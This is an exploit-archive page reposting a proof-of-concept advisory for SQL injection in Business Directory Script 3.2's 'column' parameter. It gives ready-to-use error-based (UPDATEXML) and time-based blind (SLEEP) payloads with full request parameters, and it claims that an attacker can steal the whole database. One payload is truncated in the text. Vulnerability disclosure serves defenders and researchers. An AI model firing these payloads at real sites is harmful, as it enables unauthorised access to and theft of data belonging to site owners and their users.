Business Directory Script 3.2 SQL Injection

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2023-08-26

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Business Directory Script 3.2 SQL Injection
## Title: Business-Directory-Script-3.2 SQLi
## Author: nu11secur1ty
## Date: 08/25/2023
## Vendor:
## Software:
## Reference:

## Description:
The `column` parameter appears to be vulnerable to SQL injection
attacks. The payload ' was submitted in the column parameter, and a
database error message was returned. You should review the contents of
the error message, and the application's handling of other input, to
confirm whether a vulnerability is present. Additionally, the payload
(select*from(select(sleep(20)))a) was submitted in the column
parameter. The application took 20271 milliseconds to respond to the
request, compared with 230 milliseconds for the original request,
indicating that the injected SQL command caused a time delay. The
attacker can steal all information from the database of the server of
this application!


Parameter: column (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: controller=pjAdminListings&action=pjActionGetListing&column=(UPDATEXML(2242,CONCAT(0x2e,0x716a767a71,(SELECT

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: controller=pjAdminListings&action=pjActionGetListing&column=(SELECT
6261 FROM (SELECT(SLEEP(15)))CMYC)&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=


## Reproduce:

## Proof and Exploit:

## Time spend:

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.